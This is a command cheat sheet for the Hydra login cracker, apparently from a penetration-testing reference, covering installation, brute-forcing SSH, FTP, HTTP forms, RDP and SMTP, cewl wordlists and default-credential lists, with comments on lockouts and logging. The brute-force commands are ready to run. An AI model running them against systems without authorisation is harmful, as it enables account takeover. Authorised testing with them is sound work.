Description
Hydra is a fast, parallelized online login cracker: it tries credentials against live network services and supports numerous protocols including SSH, FTP, HTTP, HTTPS, SMB, and many more. It's essential for brute-forcing credentials during penetration tests.
Installation
BASH
# Per-platform install options; these are alternatives, not one script.
# Kali (pre-installed): print the help text to confirm the binary is present
hydra -h
# Debian/Ubuntu: install the distribution package
sudo apt install hydra
# macOS: install via Homebrew
brew install hydra
# From source: clones the repository's default branch, builds it, and installs
# the result as root via `sudo make install`.
# NOTE(review): nothing here pins a release tag or verifies what was fetched;
# prefer a packaged build, or check out a specific release before running the
# install step with elevated privileges.
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra && ./configure && make && sudo make install
Basic Usage
BASH
# Flags used below: -l = a single login name, -P = a file of candidate
# passwords; the target is given as service://host.
# Every candidate is a real authentication attempt against the live service,
# so a run shows up in the target's auth logs as a burst of failed logins from
# one source and can trip account-lockout or rate-limiting controls.
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
# FTP brute force
hydra -l admin -P passwords.txt ftp://target.com
# HTTP POST form: the quoted argument is "path:request body:condition".
# ^USER^ and ^PASS^ are placeholders Hydra substitutes on each attempt;
# F=incorrect treats a response containing "incorrect" as a failed login, so
# results are only reliable if that string matches the application's real
# failure page.
hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Advanced Usage
BASH
# Multiple usernames: -L reads login names from a file, so the number of
# attempts is (users x passwords) and lockouts can hit many accounts at once.
hydra -L users.txt -P passwords.txt ssh://target.com
# Specific port: -s overrides the service's default port
hydra -l admin -P passwords.txt -s 2222 ssh://target.com
# Limit threads: -t sets the number of parallel connections per target
# (Hydra's default is 16); a lower value reduces load on the service.
hydra -l admin -P passwords.txt -t 4 ssh://target.com
# HTTP Basic Auth: http-get requests the given path (/admin) with each credential
hydra -l admin -P passwords.txt target.com http-get /admin
# RDP brute force
hydra -l administrator -P passwords.txt rdp://target.com
# SMTP brute force: the login here is the full mailbox address
hydra -l user@target.com -P passwords.txt smtp://target.com
# Resume interrupted attack: -R restores the previous session from the
# hydra.restore file in the working directory
hydra -R
# Verbose + output: -V prints every login/password pair as it is tried and
# -o writes any valid pairs found to results.txt in cleartext. Treat that
# file (and the terminal log) as sensitive engagement data.
hydra -l admin -P passwords.txt ssh://target.com -V -o results.txt
Common Workflows
BASH
# Web login brute force with custom wordlist
# cewl spiders the site to depth 3 (-d 3), keeps words of at least 5
# characters (-m 5) and writes them to custom_wordlist.txt (-w).
cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt
# Same http-post-form syntax as above ("path:request body:condition"); here a
# response containing "Invalid" is counted as a failed login.
hydra -l admin -P custom_wordlist.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"
# SSH with common creds: -C takes a file of colon-separated login:password
# pairs instead of separate -l/-P inputs. A hit from a default-credentials
# list means the service still accepts vendor defaults; the finding to report
# is that those accounts need their passwords rotated or disabled.
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt ssh://target.com